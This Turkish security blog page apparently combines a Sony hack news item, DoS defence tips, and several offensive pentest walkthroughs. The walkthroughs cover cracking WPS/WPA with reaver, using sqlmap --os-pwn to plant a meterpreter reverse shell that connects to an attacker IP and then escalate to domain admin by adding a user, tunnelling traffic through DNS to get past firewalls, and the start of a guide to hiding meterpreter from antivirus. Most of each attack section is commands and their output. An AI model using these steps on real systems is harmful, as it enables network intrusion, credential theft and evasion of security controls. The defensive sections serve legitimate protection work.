Webkiler.Net

Kalitenin Adresi Webkiler
Günümüzde birçok websitesi bulunmaktadır.Webkiler gerek kalitesi gerekse sunulan hizmeti ile ziyaretçilerin ilgi kaynağı olmuştur.Webkiler seo,teknoloji,webmasterlık,donanım gibi birçok kategori bulunmaktadır yani kısacası genel bir blog diyebiliriz.Günümüzdeki web işlerindeki ilham kaynağı olan Webkiler bu nedenle piyasada adını duyurmuş ve ziyaretçileri hayran bırakmıştır.Webkiler sunduğu kalite ve özel konuları başka yerde okuyamayacağınız yazıları karşınıza sunmakta.

Kurulduğu yıldan belli sizlere hizmet sunmaktan geri kalmayan Webkiler ailesi bu alanda sizlere birçok seçenek sunmaktadır.Ayrıca bazı cms sistemler için kategorilerin bulunması ziyaretçilerin en çok ilgisini çeken kategori olmuştur.Webkiler sunduğu güncel haberlerlede kendisinin bir kez daha lider websitesi olduğunu kanıtlamıştır.
Site adresimiz : Webkiler

Sony saldırısının arkasındaki Süpheli: Kuzey Kore.

Sony Pictures Entertainment, geçtiğimiz günlerde stüdyolarına yönelik düzenlenen siber saldırının arkasında Kuzey Kore olduğunu ifade etti. Teknoloji haber sitesi Re/code’a göre, bu saldırı, Sony stüdyosunun bilgisayar ağlarını devre dışı bırakarak, şirketi ciddi zarara uğrattı.

Siber saldırı, Sony Pictures “The Interview” isimli filmi çıkarmadan bir ay önce gerçekleştirildi. Bu film, Kuzey Kore lideri Kim Jong Un’a suikast düzenlemek için CIA tarafından görevlendirilen iki gazeteciyi konu ediniyor. Pyongyang hükümetinin “terörizme fütursuz bir destek ve bir savaş sebebi” olarak nitelendirdiği film, Kuzey Kore yöneticilerini ciddi oranda rahatsız etmişti.

Sony Pictures’ın bilgisayar sistemi geçtiğimiz Pazartesi günü çöktü. Ekranlar kararmadan önce, kırmızı bir kurukafa ve “Hacked by #GOP” ibaresi görüldü. Los Angeles Times’ın haberine göre GOP, Guardians of Peace anlamına geliyor.

Siber saldırıyı düzenleyen hackerlar aynı zamanda Sony vericilerinden çalınmış çeşitli sırların ifşası yönünde tehditte bulundukları da kaydedildi.

Haber sitesi Re/code, cuma günü yayınladığı raporda ise, Kuzey Kore adına eylemlerde bulunan, muhtemelen Çin kökenli bir grubun saldırıların arkasında bulunabileceği yönünde Sony’nin araştırmalar
sürdürdüğünü bildirdi. Re/code ayrıca sözkonusu ülkelerle ilgili herhangi bir somut bağlantının henüz bulunamadığını da bilgiler arasına ekledi.

The Interview adlı fimin ABD’de 25 Aralık’ta gösterime girmesi planlanıyor. Filmde iki gazeteci, Kuzey Kore lideriyle planladıkları söyleşi sırasında onu öldürmek maksadıyla CIA tarafından görevlendiriliyor. Kuzey Kore Dışişleri Bakanlığı sözcüsü, film eğer gösterime girerse, “merhametsiz bir karşı saldırı” düzenleneceği konusunda tehditlerde bulunmuştu. Kuzey Kore hükümeti ayrıca, ABD Başkanı Barak Obama’ya, filmin gösterimini durdurması yönünde mektup da yazmıştı.

DoS/DDoS Saldırılarından Korunmak Için Temel Öneriler

DOS saldırılarından korunmanın sihirbazvari bir yolu yoktur. Korunmanın en sağlam yöntemi korumaya çalıştığınız network yapısının iyi tasarlanması, iyi bilinmesi ve bu konuyla görevli çalışanların TCP/IP bilgisinin iyi derecede olmasıdır. Çoğu DOS saldırısı yukarıda sayılan bu maddelerin eksikliği sebebiyle başarılı olur. Bu yazıda temel seviyede koruma amaçlı ağ ve güvenlik sistemleri seviyesinde yapılması gereken ayarlardan bahsedilmiştir. Router(Yönlendirici) Seviyesinde Koruma Sınır koruma düzeninde ilk eleman genellikle Router’dır. Sisteminize gelen-giden tüm paketler öncelikle router’dan geçer ve arkadaki sistemlere iletilir. Dolayısıyla saldırı anında ilk etkilenecek sistemler Router’lar olur. Kullanılan router üzerinde yapılacak bazı ayalar bilinen DOS saldırılarını engellemede, ya da en azından saldırının şiddetini düşürmede yardımcı olacaktır. Yine saldırı anında eğer gönderilen paketlere ait karekteristik bir özellik belirlenebilirse router üzerinden yazılacak ACL(Erişim Kontrol Listesi)ler ile saldırılar kolaylıkla engellenebilir. Mesela saldırganın SYN flood yaptığını ve gönderdiği paketlerde src.port numarasının X olduğunu düşünelim(Türkiye’de yapılan dos saldırılarının çoğunluğu sabit port numarasıyla yapılır, juno kullanılarak). Router üzerinde kaynak port numarası X olan paketleri engellersek saldırıdan en az kayıpla kurtulmuş oluruz. Bu arada kaynak portunu X olarak seçen ama saldırı yapmayan kullanıcılardan gelen trafiklerde ilk aşamada bloklanacak ama normal kullanıcılardaki TCP/IP stack hemen port numarasını değiştirerek aynı isteği tekrarlayacaktır. Tabi bu engelleme yöntemi her saldırı için geçerli olmayabilir. C programlama bilgisi olan birisi rahatlıkla juno’nun koduyla oynayarak rastgele portlardan SYN flood yapmasını sağlayacaktır. Yine routerlar üzerinden alınacak Netflow bilgisiyle saldırının şiddeti, karekteristiği, ne kadar sürdüğü ve nerelerden geldiği bilgileri kayıt altına alınabilir. Dış routerlarda eğer cihaz performans problemine sebep vermeyecek şekilde Netflow alımını sağlıyorsa bu özellik mutlaka kullanılmalıdır. Fakat bazı sistemler düzgün yapılandırılmadığından netflow sunucuya paket göndermeye çalışırken performans problemine sebep olabilirler. Güvenlik Duvarı Seviyesinde Koruma Güvenlik duvarlarında alınabilecek önlemlerden ilki –eğer cihaz destekliyorsa- rate limiting özelliğini aktif etmektir. Rate limiting özelliğiyle belirli bir ip adresinden gelecek maksimum paket sayisi belirlenip eşik değerini aşan ip adresleri belirli süreliğine bloklanabilir. Böylece saldırı yapan sistemler ve normal sistemler ayırt edilebilir. Bu özellik dikkatli kullanılmazsa akıllı bir saldırgan tüm internet bağlantınızı bloklayabilir. Bunun haricinde güvenlik duvarlarında kurulumla birlikte gelen ön tanımlı bazı ayarlar değiştirilmelidir. Bu ayarlar Firewall’dan gelip-geçen paketler için ne kadarlık bir süre kaynak ayrımı yapılacağını belirtir. Güvenlik duvarı üzerinde ön tanımlı ayarların değiştirilmesi Güvenlik duvarı kısaca koruma altına aldığı sistemlere gelen paketleri karşılayan ve üzerinde yazılı politikaya göre paketlerin geçişine izin veren sistemlerdir. Günümüz güvenlik duvarları durum koruma (stateful) özelliğine sahiptir. Böylece her gelen paket için tüm güvenlik duvarı kuralları tekrar tekrar incelenmez, eğer gelen-giden paket daha önceki bir bağlantıya ait ise doğrudan geçirilir. Bunu sağlayabilmek için güvenlik duvarları üzerinden gelip geçen her bir paket için sistemde kaynak ayırır.(Paketin cevabını ne kadarlık süre bekleneceği vs). Ayrılan bu kaynaklar DDOS saldırısı esnasında çabucak tükenir. DDOS saldırılarına karşı daha sağlam bir güvenlik duvarı için gelip-giden paketler için tutulan zaman aşımı süreleri kısaltılabilir. TCP ve UDP paketleriyle ilgili oturum bilgilerinin varsayılan değerlerinin değiştirilmesi # pfctl -st No ALTQ support in kernel ALTQ related functions disabled tcp.first 100s tcp.opening 100s tcp.established 96000s tcp.closing 33s tcp.finwait 10s tcp.closed 20s tcp.tsdiff 30s udp.first 60s udp.single 30s udp.multiple 60s icmp.first 20s icmp.error 10s other.first 60s other.single 30s other.multiple 60s frag 30s interval 10s adaptive.start 1200000 states adaptive.end 2400000 states src.track 0s Yukardaki değerler Packet Filter güvenlik duvarından alınmıştır(pfctl –s timeouts), TCP bağlantıları için başlangıç paketi SYN alındıktan sonra ACK paketinin gelmesi için bağlantı 120 sn açık bırakılmaktadır. Bu değerler günümüz internet dünyası için fazla gelmektedir. Bu değerlerin 10’da biri bile normal işleyen bir ağda yeterlidir. Saldırı esnasında bu değerlerin düşürülmesi saldırının etkisini önemli oranda azaltacaktır. Güvenlik duvarı syncookie, synproxy özelliklerinden birine sahipse bu özelliğin aktif edilmesi Synflood saldırılarına karşı en ciddi korumayı sağlayacaktır. Syncookie, syncache ve synproxy özellikleri syn flood saldırılarında oturum kurulmamış TCP paketlerinin unucuya ulaşmasını engelleyip DDOS’dan korumuş olur. Gelen saldırının şiddetine göre syncookie koruması yapan güvenlik duvarı da devre dışı kalabilir. Eğer sisteminiz destekliyorsa syncookie yerine synproxy özelliği daha sağlıklı bir koruma sağlayacaktır. Saldırı Engelleme Sistemi(IPS) Seviyesinde Koruma IPS’ler bilinen DOS/DDOS saldırılarına yönelik çeşitli saldırı imzalarını veritabanlarında barındırırlar. Her ne kadar bu saldırı tipleri çok klasik olsa da günümüzde denenmektedir. IPS’ler üzerinde ilk yapılacka iişlem DOS/DDOS saldırılarına karşı önlem olabilecek imzaların devreye alınmasıdır. Basit bir SYNFlood önlemi Aşağıdaki saldırı imzası shaft aracı kullanılarak yapılan DDOS salırılarını belirler. Saldırı Tespit/Engelleme sistemlerinin bu tip bilinen araçlar icin çeşitli imzaları bulunmaktadır. alert tcp $HOME_NET any $EXTERNAL_NET any (msg:”DDOS shaft synflood”; flow:stateless; flags:S,12; seq:674711609; metadata:policy security-ips drop; reference:arachnids,253; reference:cve,2000-0138; classtype:attempted-dos; sid:241; rev:11;) Alternatif bir kural (Generic Syn Flood Atağı) alert tcp any any -> $WEB_SUNUCU 80 (msg:”Syn Flood Saldirisi”; flow: stateless; flags:S,12; threshold: type threshold, track by_src, count 100, seconds 1; classtype:attempted-recon; sid:10009;rev2;) Ek olarak eğer destekliyorsa IPS üzerinde syncookie özelliği devreye alınmalıdır ve firewall’dakine benzer şekilde stateful bağlantılarda zamanaşımı sürelerinin iyi ayarlanması saldırıların etkisini azaltacaktır. Web Sunuculara Yönelik Koruma Web sunucular şirketlerin dışa bakan yüzü olduğu için genellikle saldırıyı alan sistemlerdir. Web sunuculara yönelik çeşitli saldırılar yapılabil fakat en etkili saldırı tipleri GET flood saldırılarıdır. Bu saldırı yönteminde saldırgan web sunucunun kapasitesini zorlayarak normal kullanıcıların siteye erişip işlem yapmasını engeller. Bu tip durumlarda güvenlik duvarlarında uygulanan rate limiting özelliği ya da web sunucular önüne koyulacak güçlü yük dengeleyici/dağıtıcı(load balancer)cihazlar ve ters proxy sistemleri oldukça iyi koruma sağlayacaktır. Güvenlik duvarı kullanarak http GET isteklerine limit koyulamaz. Zira http keepalive özelliği sayesinde tek bir TCP bağlantısı içerisinden yüzlerce http GET komutu gönderebilir. Burada paket içeriğine bakabilecek güvenlik duvarı/ips sistemleri kullanılmalıdır. Mesela Snort saldırı tespit/engelleme sistemi kullanılarak aşağıdaki kuralla 3 saniyede 50’den fazla http GET isteği gönderen ip adresleri bloklanabilmektedir. Drop tcp any any -> $WEB_SUNUCU 80 (msg:”HTTP GET Flood Attack Attempt”; flow:established,to_server; content:”GET /”; detection_filter: track by_src, count 50, seconds 3; sid:1000001; rev:1;) İşletim sistemleri üzerinde basit koruma ayarları Synflood saldırılarına karşı koruma amaçlı temelde iki çözüm bulunmaktadır. Bunlardan biri syn cookie diğeri de syn proxy’dir. Linux sistemlerde syncookie özelliğinin aktif hale getirilmesi için /etc/sysctl.conf dosyasına net.ipv4.tcp_syncookies = 1 eklenmeli ve sysctl –p komutu çalıştırılmalı ya da geçici olarak echo 1 > /proc/sys/net/ipv4/tcp_syncookies komutu kullanılamalıdır. Windows için aynı özelliği devreye alacak çeşitli registry ayarları mevcuttur. Ağınızdan DOS/DDOS yapılmasını Engelleme Ağınızdan sahte ip adresine sahip paketlerin çıkışını engellemek için kullanılan güvenlik duvarlarındaki antispoof ya da URPF özellikleri kullanılabilir. Sahte ip kullanmadan gerçekleştirilen saldırılar için internet çıkış trafiğini izleyen basit bir IDS sisteminin olması yeterli olacaktır. IDS olarak Snort kullanılabilir.

WPS Destekli Kablosuz Ağların WPA/WPA2 Parolasını Kırmak

WPS (Wi-Fi Protected Setup) teknolojisi, kablosuz ağın güvenlik ayarlarını kolayca ayarlamak için kullanılan esnek bir teknolojidir.

Kablosuz ağ cihazını yapılandırırken, üzerinde bulunan PIN numarası ile cihazın yapılandırılmasını sağlar.

Saldırgan, WPS’de bulunan güvenlik zaafiyeti ile bu PIN numarasını tahmin ederse WPA/WPA2 anahtarını ele geçirebilir. WPA/WPA2 anahtarı ne kadar karmaşık ve uzun olursa olsun, PIN numarası tahmin edildiğinde anahtar elde edilebilir.

Örnek Uygulama
Bu işlemleri yapmak için, ağ kartının monitor modu desteklemesi lazım.
Kablosuz ağ kartınız monitor modu destekliyor mu, bu nu görmek için şu yazıdan faydalanabilirsiniz.

# airmon-ng start wlan0

Found 3 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID Name
976 dhclient3
2077 dhclient
2134 dhclient3
Process with PID 2134 (dhclient3) is running on interface wlan0

Interface Chipset Driver

wlan0 Ralink RT2870/3070 rt2800usb – [phy0]
(monitor mode enabled on mon0)

WPS destekli kablosuz ağları bulmak için,

# wash -i mon0 -C

Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
BSSID Channel RSSI WPS Version WPS Locked ESSID
—————————————————————————————————————
00:88:11:66:99:11 1 -69 1.0 No ANGARA
00:22:6B:F1:33:2E 9 -39 1.0 No BGA
88:FF:11:99:77:33 11 -56 1.0 No SECLABS_Network
00:22:66:11:49:AA 11 -72 1.0 No BGAKADEMIS
I

Hedefimizde “BGA” kablosuz ağı var, bu cihazın BSSID değerini ve yayın yaptığı kanal numarasını not edelim.

BSSID = 33:22:55:22:11:2F
CH = 9

# reaver -i mon0 -b 33:22:55:22:11:2F -c 9 -vv –no-nack -d 5 -f -x298

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

[+] Switching mon0 to channel 9
[+] Waiting for beacon from 33:22:55:22:11:2F
[+] Associated with 33:22:55:22:11:2F (ESSID: BGA)
[+] Trying pin 47128211
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 9 seconds
[+] WPS PIN: ‘47128211’
[+] WPA PSK: ‘benimgizliparolam876!#’
[+] AP SSID: ‘BGA’
[+] Nothing done, nothing to save.

Modemin WPS özelliği kapalıda olsa, saldırı başarılı olabiliyor. Teorik olarak WPS PIN numarasını tespit etmek maksimum 10 saat sürüyor, pratikte bazı özel durumlarda hedef kablosuz ağa bağlantılar zaman aşımına uğrayabilir ve bu zaman uzayabilir.

SQL Injection Aracılığıyla Domain Admin Olma

SQL Injection(+UDF Command Execution) Kullanarak Domain Admin Haklarını Elde Etme Sql Injection saldırıları genellikle veri tabanı sistemlerinden bilgi çalmak için gerçekleştirilmektedir. Veri çalma saldırıları dışında, hedef sistemin kullandığı veri tabanı sisteminin çalıştığı sunucuda komut çalıştırma saldırılarıda yapılabilmektedir. Sql Injection ile komut çalıştırma saldırıları dendiğinde ilk akla gelen, SQL server’ın xp_cmdshell metodudur. Bu konu ile ilgili BGA tarafından hazırlanan dökümana aşağıda ki linkten ulaşabilirsiniz. Bu dökümanda MySQL ve PostgreSQL sistemlerine yapılan saldırılar ele alınmıştır. MySQL ve PostgreSQL veri tabanı sistemleri, “shared libraries” desteği vermektedirler. Shared Libraries için kullanıcıların kendi tanımladıkları veri tabanı fonksiyonlarının bulunduğu kütüphaneler diyebiliriz. Eğer bu kütüphanelerin binary halleri, hedef veri tabanı sisteminin “shared libraries” tanımak için belirttiği dizine yerleştirilebilirse, özelleştirilmiş bu fonksiyonlar veri tabanı sistemine dahil edilebilir. – sys_eval(cmd): Çalışan komutun çıktısı olarak standart çıktıyı döndürür. – sys_exec(cmd): Çalışan komutun çıktısı olarak durumunu döndürür. Kullanıcı taraflı tanımlanmış olan bu iki metod’un bulunduğu kütüphane, hedef veri tabanı sistemine dahil edilebilirse. Ardından hedef işletim sistemi üzerinde komut çalıştırılabilmektedir. Bu kütüphanelerin kaynak kodlarını görmek için, işletim sistemi ve mimariye göre sınıflandırılmış olan sqlmap’in github kaynağına göz atabilirsiniz. https://github.com/sqlmapproject/udfhack Hedef işletim sisteminde komut çalıştırabiliyor olmak, hedef sisteme zararlı yazılım yükleme işleminide beraberinde getirmektedir. Sqlmap aracı, hedef sistemi meterpreter ajanı ile ele geçirmek üzere kullanılabilmektedir. Örnekte bu saldırı ele alınmıştır. I. Adım = Hedef sistemdeki SQL Injection açığlığının tespit edilmesi root@bt:/sqlmap# python sqlmap.py -u “http://pentest.hack2net.com/sqli-test.aspx?bgatestID=684” Hedef sistemde bulunan SQL Injection zafiyeti ile 3 türde saldırı yapılabilmektedir. — Place: GET Parameter: bgatestID Type: error-based Title: MySQL >= 5.0 AND error-based – WHERE or HAVING clause Type: UNION query Title: Generic UNION query (NULL) – 2 columns Type: stacked queries Title: MySQL > 5.0.11 stacked queries — II. Adım: Hedef sistemesql injection kullanarak meterpreter ajanı yüklenmesi( –os-pwn parametresi) root@bt:/sqlmap# python sqlmap.py -u “http://pentest.hack2net.com/sqli-test.aspx?bgatestID=1” –os-pwn Hedef sistem hakkında bilgilerin girilmesi. [13:29:45] [INFO] the back-end DBMS is MySQL web server operating system: Windows 2008 web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0. back-end DBMS: MySQL 5.0 [1] TCP: Metasploit Framework (default) [2] ICMP: icmpsh – ICMP tunneling > 1 [13:30:14] [INFO] testing if current user is DBA [13:30:14] [INFO] fetching current user what is the back-end database management system architecture? [1] 32-bit (default) [2] 64-bit > 2 Hedef sistemde C:/Program Files/MySQL/MySQL Server 5.1/lib/plugin/ dizini altına kendi kütüphanemiz yüklenmiştir. Bu kütüphane içinde komut çalıştırabilen 2 adet metod tanımlıdır. [13:30:23] [INFO] creating UDF ‘sys_bineval’ from the UDF binary file. [13:30:23] [INFO] creating UDF ‘sys_exec’ from the UDF binary file. do you want confirmation that the file ‘C:/Program Files/MySQL/MySQL Server 5.1/lib/plugin/libsmtqp.dll’ has been successfully written on the back-end DBMS file system? [Y/n] Y Hedef sisteme kütüphanelerin eklenmesi başarıyla gerçekleştirilmiştir. Şimdi ise hedefe gönderilecek meterpreter ajanının hangi teknik ile çalıştırılacağı seçilecektir. Örnekte 2. şık ile hedef sistemin diskine .exe dosyası eklenmesini tercih edilmiştir. 1.şık ise meterpreter ajanının direk memory üzerinde çalışması yöntemidir. [13:30:52] [INFO] the file has been successfully written and its size is 11264 bytes, same size as the local file ‘/sqlmap/udf/mysql/windows/64/lib_mysqludf_sys.dll’ [13:30:53] [INFO] creating UDF ‘sys_bineval’ from the binary UDF file [13:30:53] [INFO] creating UDF ‘sys_exec’ from the binary UDF file how do you want to execute the Metasploit shellcode on the back-end database underlying operating system? [1] Via UDF ‘sys_bineval’ (in-memory way, anti-forensics, default) [2] Via shellcodeexec (file system way, preferred on 64-bit systems) > 2 Hedef işletim sisteminde çalışacak ajanın merkez ile (saldırgan ile) hangi teknik üzerinden iletişimde bulunacağının tercihi yapılmıştır. Hedefin NAT arkasında bir sistem olma ihtimalinden ötürü Reverse TCP tekniği seçilmiştir. Ardından ise Reverse TCP tekniği ile hangi ip adresinin hangi portuna bağlantının kurulacağı gibi bilgiler girilmektedir. [13:31:16] [INFO] creating Metasploit Framework multi-stage shellcode which connection type do you want to use? [1] Reverse TCP: Connect back from the database host to this machine (default) [2] Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535 [3] Reverse HTTP: Connect back from the database host to this machine tunnelling traffic over HTTP [4] Reverse HTTPS: Connect back from the database host to this machine tunnelling traffic over HTTPS [5] Bind TCP: Listen on the database host for a connection > 1 which is the local address? [11.22.33.44] 11.22.33.44 which local port number do you want to use? [10991] 80 which payload do you want to use? [1] Meterpreter (default) [2] Shell [3] VNC > 1 Hedef sistemde C:/Windows/Temp/shellcodeexec.x32.exe dizinine meterpreter ajanı SQL Injection saldırısı ile yerleştirilmiştir. [13:31:58] [INFO] creation in progress ……….. done [13:32:09] [INFO] uploading shellcodeexec to ‘C:/Windows/Temp/shellcodeexec.x32.exe’ [13:32:10] [INFO] adjusting time delay to 1 second due to good response times do you want confirmation that the file ‘C:/Windows/Temp/shellcodeexec.x32.exe’ has been successfully written on the back-end DBMS file system? [Y/n] “Y”es butonu ile hedef yerleştirilen meterpreter ajanı çalıştırılmıştır. ve hedef veri tabanı sisteminin üzerinde çalıştığı işletim sistemi NT AUTHORITY\SYSTEM yetkileri ile ele geçirilmiştir. Domain Admin Haklarına Geçiş PAYLOAD => windows/meterpreter/reverse_tcp EXITFUNC => process LPORT => 80 LHOST => 11.22.33.44 [*] Started reverse handler on 11.22.33.44:80 [*] Starting the payload handler… [13:32:48] [INFO] running Metasploit Framework shellcode remotely via shellcodeexec, please wait.. [*] Sending stage (752128 bytes) to 5.5.5.5 [*] Meterpreter session 1 opened (11.22.33.44:80 -> 5.5.5.5:52546) at 2012-08-21 meterpreter > success. meterpreter > Loading extension incognito…success. meterpreter > Computer : BGATEST123 OS : Windows 2008 Architecture : x64 (Current Process is 64) System Language : en_US Meterpreter : x86/win32 meterpreter > Server username: NT AUTHORITY\SYSTEM meterpreter > meterpreter > impersonate_token TEST_DOMAIN123\\Administrator [+] Delegation token available [+] Successfully impersonated user TEST_DOMAIN123\Administrator meterpreter > getuid Server username: TEST_DOMAIN123\Administrator meterpreter > shell Process 9006 created. Channel 1 created. Microsoft Windows Server 2008 [Version 7.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32> whoami TEST_DOMAIN123\administrator C:\WINDOWS\system32> net user bgatest bGa_pass123 /add /TEST_DOMAIN123 The command completed successfully. C:\WINDOWS\system32> net group “TEST_DOMAIN123 Admins” bgatest /add /TEST_DOMAIN123 The command completed successfully.

DNS Tünelleme Kullanarak Firewall/IPS Atlatma

Senaryo: Firewall ve Web Proxy (/Content Filter) ile tüm internet trafiği engellenmiş bir kullanıcı/hacker internete  ulaşmak istiyor.

Yerel ağdan internete giden tüm port ve protokoller Firewal tarafından engellenmiştir. Web erişimi için hizmet veren proxy ise yalnızca yetkili kulllanıcılara internet erişimi sağlamaktadır.

Bu sistemlere takılmadan sınırsız ve kayıt altına alınamaz internet trafiği nasıl elde edilebilir ?

DNS Tunnel

Bir protokol içerisinde başka bir protokole ait veri taşıma işlemine protokol tünelleme denir. DNS paketleri içersinden herhangi bir tcp/udp paketini (örneğin, http,ftp, ssh vb.) taşıma işlemi de DNS Tünnelleme olarak isimlendirilir.

DNS sunucu kendisinden sorgulanan bir dns isteğine önce önbelleğini kontrol ederek yanıt vermek ister eğer alan adı dns önbelleğinde yoksa, sorgulanan alan adından sorumlu dns sunucuyu bulur ve ona sorar. Sorgulanan alan adından yetkili dns sunucu ilgili dns kaydı için yanıt verir ve DNS sunucu bu yanıtı istemciye iletir.

Örnek

Kullanıcı, tunnel.bga.com.tr alan adını sorgulamak istediğinde yerel ağındaki dns sunucu bu kayıt önbelleğinde yoksa bu isteğe doğrudan yanıt veremez. tunnel.bga.com.tr  alan adından sorumlu dns sunucuyu bulur dns.bga.com.tr  ve ona tunnel A kaydını sorar aldığı yanıtı istemciye iletir.

Tcp-Over-Dns Çalışma Prensibi

tcp-over-dns client, dns verisini encode ederek ISP’nin dns sunucusuna iletir. ISP’nin dns sunucuyu bu isteğe yanıt veremez ve dns isteğini tcp-over-dns server a iletir. tcp-over-dns server gelen isteği decode eder ve ilgili isteğe yanıtı client a  geri gönderir.  DNS isteklerinin, dns sunucu tarafından önbelleğe alınma ihtimaline karşı her dns sorgusunda rastgele bir subdomain kullanılır.

Ön Gereksinimler:

1. Dns isteklerinize yanıt alabildiğinizi doğrulamalısınız. Örneğin; ‘nslookup  google.com.tr’ komutu ile google ip adreslerini öğrenebiliyorsanız. DNS isteklerinize yanıt veriliyordur.
2. İnternet dünyasında sizin kontrolünüzde olan bir sunucu.Administrator veya root yetkilerine sahip olmalısınız. UDP 53 portu farklı bir uygulama tarafından kullanılmıyor olmalı ve erişim problemi yaşanmamalıdır.
3. Kullandığınız işletim sistemine göre tcp-over-dns yazılımı. Mutlaka java kurulu olmalıdır.
   http://analogbit.com/software/tcp-over-dns

Tcp-Over-Dns Server Yapılandırması

Bu işlem için bir  alan adına ve bu alan adından sorumlu dns sunucuya ihtiyaç vardır. Bu örnekde aşağıdaki dns kayıtları oluşturup, kullanılmıştır. 

NS = dns.bga.com.tr

A   = tunnel.bga.com.tr

tcpoverdns, multi platform çalışmaktadır (Windows,Linux,*BSD). Bu örnekde dns sunucu FreeBSD istemci ise Windows 7  işletim sisteminde kurulmuştur.

Not: Tcp-Over-Dns server, gelen trafiği port 443 (ssh servisine) yönlendirecektir.

Tcp-Over-Dns Client, yerel bilgisayarda 8080 portunu dinleme açtı ve bu porta yapılan bağlantıları tunnel.bga.com.tr makinasının 443 (ssh) portuna iletecektir.

Test için, putty aracı ile 127.0.0.1:8080 portuna bağlantı isteği başlatıldığında  bga.com.tr adresinin 443 portuna erişim kurulacaktır.

SSH trafiği Firewall tarafından engellenmiş olsada, DNS paketleri ile ssh trafiği internete kaçırıldı.

Bu yöntem ile birçok yerde bulunan Hotspot sistemleri de atlatılabilmek mümkündür.

Pentest Çalışmalarında Exploit Denemelerinin Olumsuz Sonuçları

Pentest çalışmalarının en heyecanlı aşamalarından biri exploitation – yani istismar- aşamasıdır. Bu adımda hedef sisteme sızma ya da hedef sistemden işe yarar bilgiler elde etme amaçlanır. Bu aşamada kullanılan exploitin kalitesine ve hedef sistemin durumuna bağlı olarak farklı durumlar gerçekleşebilir. Bu durumlardan iki tanesinin kötü durum senaryosu olarak karşımıza çıkma olasılığı olduğu için üzerinde durmakta fayda görüyoruz.

Tecrübelerimiz, çalışan ortamlarında gerçekleştirilen sızma testlerinde exploitlerin çalıştırılmadan mutlaka lab ortamında denenmesi ve hedef sistemde denenmeden  izin alınması ve bu iznin sözlü değil yazılı olmasına dikkat edilmesi gerektiğini göstermektedir.

Exploit çalıştırıldığında

• Başarılı olup istediğimizi elde etmemizi sağlayabilir,




• Hedef sisteme zarar verip çalışmasını engelleyebilir ya da hedef sistemi dışarıya korunmasız olarak açabilir,




• Kendi sisteminize zarar verebilir.

 

Sahte Exploit Konusu

Pentest süreçlerinde genellikle exploit deneme aşamalarında exploit önce Metasploit gibi araçlarla ve exploit-db, securityfocus gibi sitelerden araştırılır. Buralarda bulunmazsa alternatif olarak Google üzerinen araştırma yapılır. Eğer exploit denemesini yapacak kişi exploitin yazıldığı programlama diline hakim değilse ve kodu hiç incelemeden doğrudan çalıştırıyorsa bu ciddi sıkıntılara yol açabilir.

 

Örnek olarak geçtiğimiz günlerde yayınlanan MS12-020 RDP açıklığını ele alacak olursak. Açıklık ilk yayınlandığında çalışan exploitin olmaması nedeniyle herkes ufak tefek denemeler yaparak internet üzerinden paylaşımlarda bulunuyordu. Bu paylaşımlardan bazıları da doğrudan sahte exploit olarak adlandırabileceğimiz kategoriye giriyordu. Özellikle güvenlikcilerin takip ettiği e-posta listelerine gönderilen mailler Google’un arşivinde değerli bilgi kaynağı olarak görüldüğü için tecrübesiz pentesterlar tarafından doğrudan alınıp kullanuılma tehlikesini barındırmaktadır.

Aşağıdaki örnek FullDisclosure e-posta listesine gönderilen exploit kodunun “basit” analizini içermektedir.

Duruyu maili:



 

Exploit’in shellcode kısmı:



 

Hex kodlanmış payload çözümlenirse aşağıdaki -sağda- gibi bir komut seti ortaya çıkacaktır. Basitçe payload işletim sistemini belirleyip ona göre sistemi silen komutlar icra ediyor. Yani bu exploit çalıştırıldığı sistemi siliyor.



Diğer bir sıkıntı da çalıştırılan exploitin hedef sisteme zarar vermesi şeklinde karşımıza çıkmaktadır. Buna örnek olarak da FreeBSD local root exploitini ele alalım (Hedef sisteme zarar verebilecek exploitlerin local olmasına gerek yok, remote tipte exploitler de zarar verebilir)



 

Aşağıdaki gibi exploit çalıştırıldığında hedef sistemde root haklarıyla komut çalıştırmak yerine doğrudan sistemin crash olmasına neden olabilir.



 

Bu nedenle BGA pentest ekibi olarak pentest yapacağımız çoğu sistemi kendi lab ortamımızda kurarak önce sıkıntılı testleri lab ortamında gerçekleştirip sonrasında müşteri ortamına uyarlamaya özen gösteriyoruz.

Firewall Arkasındaki Sistemler İçin Pratik Reverse Shell Alma Yöntemleri

Pentest çalışmalarında, hedef sistemi ele geçirdikden sonra yetkisiz işlevleri yerine getirecek bir payload’a ihtiyaç duyulur. Bu bir casus yazılım olabilir (trojan), uzakdan yönetim aracı olabilir (rat) veya hedef sistemde kod/komut çalıştırmanıza olanak sağlayan bir araç   (shellcode exec) olabilir.

BGA pentest ekibi, pentest çalışmalarında ve eğitimlerde multi platform çalışan ve gelişmiş özellikleri olan meterpreter payloadını sıklıkla tercih etmektedir.

Antivirus veya sezgisel antilogger’lar bu tür durumlarda işinizi zorlaştırabilir. Bu yazıda, antiviruslerin çalışma prensiblerine kısaca değinilmiş ve meterpreter ajanının antivirusler tarafından tanınmaz hale getirilmesi teorik olarak anlatılmıştır. Burada anlatılan yöntemler, backtrack 5 r2 üzerinde test edilmiştir ve meterpreter için geçerlidir fakat bu mantık  benzeri yazılımlar içinde uygulanabilir !

Antivusler Nasıl Çalışır ?

• İmza tabanlı (Signature Based)




• ShellCode Analizi




• Sezgisel (heuristic)

İmza tabanlı (Signature Based)

• Her imza bir zararlının karakteristik özelliklerini barındırır.




• Tespit edilmiş viruslere ait imzaları içerir.




• Hızlı sonuç verir.




• Yeni nesil viruslere karşı savunmasızdır.




• Zararlının tespit edilmesi, veritabanına konulması ve son kullanıcıya ulaşması yeni nesil tehtitler karşısında ciddi zaman kaybı yaşatmakdadır.

Sezgisel (heuristic)

• Zararlıyı, sezgisel ve gerçek zamanlı davranış analizi yaparak tespit etmeye çalışır.

